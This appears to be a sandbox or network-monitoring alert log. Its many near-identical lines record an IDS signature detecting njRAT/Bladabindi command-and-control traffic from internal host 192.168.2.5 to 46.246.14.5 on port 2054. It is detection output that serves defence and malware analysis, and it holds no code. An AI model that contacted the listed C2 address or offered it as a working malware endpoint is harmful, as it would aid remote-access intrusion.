2024-09-24T23:43:28.533513+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.594349+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.604145+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.710877+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.717516+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.759578+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.764481+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.783239+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.788142+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.799137+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.803986+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.809192+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.814040+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.819026+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.827339+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.832212+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.837105+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.846874+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.851786+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.857542+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.862461+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.867519+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.872424+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.877351+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.882331+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.887407+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.892222+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.897183+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.903094+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.907995+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.912929+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.922512+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.927408+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.932640+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.937535+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.942495+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.947467+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.952492+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.960206+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.965153+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.974040+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.979034+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.983941+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.990473+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:28.995400+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.019599+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.024470+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.030352+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.035210+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.040305+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.045233+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.050242+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.056778+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.061704+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.066944+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.071770+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.077268+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.084949+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.089881+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.094780+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.099687+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.104722+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.111648+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.116486+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.121361+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.126408+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.131320+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.138391+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.143468+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.148521+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.153558+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.159422+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.164473+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.171923+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.178235+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.183239+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.188057+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.192942+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.197816+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.206278+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.211298+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.216415+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.222769+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.227690+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.234508+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.239434+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.244394+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.253771+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.261440+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.271520+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.276556+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.296602+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.301512+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.336453+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.365146+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.374403+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.379547+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.385443+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.411311+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.416290+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.421134+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.426067+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.431122+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.436029+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.440890+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.446154+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.451136+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.456217+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.462761+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.467772+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.472832+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.477695+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.482599+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.488589+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.493429+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.498333+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.503224+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.510389+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.516863+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.521699+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.526568+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.531410+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.538302+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.544650+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.551451+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.558176+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.563156+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.568017+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.574246+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.579413+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.584766+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.589663+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.612118+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.616991+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.621931+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.629480+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.634321+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.641756+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.646624+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.654255+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.659347+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.664384+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.696786+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.701969+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.706950+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.712803+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.717756+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.723112+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.728150+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.733043+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.737966+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.745380+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.750254+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.755086+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.759944+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.764884+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.770175+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.775157+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.795804+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.802249+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.834732+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.847551+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.891818+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.901106+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.930283+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.935245+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.940260+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.945085+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.949996+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.978200+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:29.993522+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:30.000208+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:30.005502+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:30.011799+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:30.017105+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
2024-09-24T23:43:30.022324+0200	2825564	ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act)	1	192.168.2.5	56145	46.246.14.5	2054	TCP
